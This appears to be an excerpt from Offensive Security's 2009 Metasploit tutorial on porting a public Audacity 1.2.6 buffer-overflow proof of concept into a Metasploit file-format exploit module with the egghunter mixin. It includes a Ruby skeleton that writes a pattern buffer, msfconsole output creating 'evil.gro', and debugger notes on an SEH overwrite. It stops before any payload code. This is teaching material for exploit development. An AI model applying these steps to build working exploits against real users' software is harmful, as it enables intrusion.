Close
Notification:  
Professional
Login
Loading

Using the Egghunter Mixin

The MSF egghunter mixin is a wonderful module which can be of great use in exploit development. If you're not familiar with the concepts of egghunters, read this.

A recent vulnerability in the Audacity Audio Editor presented us with an opportunity to examine this mixin in greater depth. In the next module, we will exploit Audacity and create a Metasploit file format exploit module for it. We will not focus on the exploitation method itself or the theory behind it - but dive right into the practical usage of the Egghunter mixin.

Setting up Audacity

  1. Download and install the vulnerable software on your XP SP2 box ./archive/audacity-win-1.2.6.exe
    ./archive/LADSPA_plugins-win-0.4.15.exe
  2. Download and examine the original POC, taken from : http://milw0rm.com/exploits/7634

Porting the PoC

Let's port this POC to an MSF file format exploit module. We can use an existing module to get a general template. The zinfaudioplayer221_pls.rb exploit provides us with a good start.

Our skeleton exploit should look similar to this. Notice our buffer being generated here:

 def exploit
    buff = Rex::Text.pattern_create(2000)
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(buff)
 end



We use Rex::Text.pattern_create(2000) to create a unique string of 2000 bytes in order to be able to track buffer locations in the debugger.

Once we have the POC ported, we generate the exploit file and transfer it to our Windows box. Use the generic/debug_trap payloads to begin with.


root@bt4:/pentest/exploits/framework3# ./msfconsole

=[ metasploit v3.3-testing [core:3.3 api:1.0]
+ -- --=[ 399 exploits - 246 payloads
+ -- --=[ 21 encoders - 8 nops
=[ 182 aux

msf exploit(audacity) > show options

Module options:

Name       Current Setting Required Description
----       --------------- -------- -----------
FILENAME   evil.gro        yes      The file name.
OUTPUTPATH /var/www        yes      The location of the file.


Payload options (generic/debug_trap):

Name Current Setting Required Description
---- --------------- -------- -----------


Exploit target:

Id Name
-- ----
0 Audacity Universal 1.2


msf exploit(audacity) > exploit

[*] Creating 'evil.gro' file ...
[*] Generated output file /var/www/evil.gro
[*] Exploit completed, but no session was created.
msf exploit(audacity) >

We open Audacity, attach a debugger to it and import the MIDI gro file.



We immediately get an exception from Audacity, and the debugger pauses:



A quick look at the SEH chain shows that we have overwritten an exception handler.


We take the exception (shift + F9), and see the following:



 
 




 

© Offensive Security 2009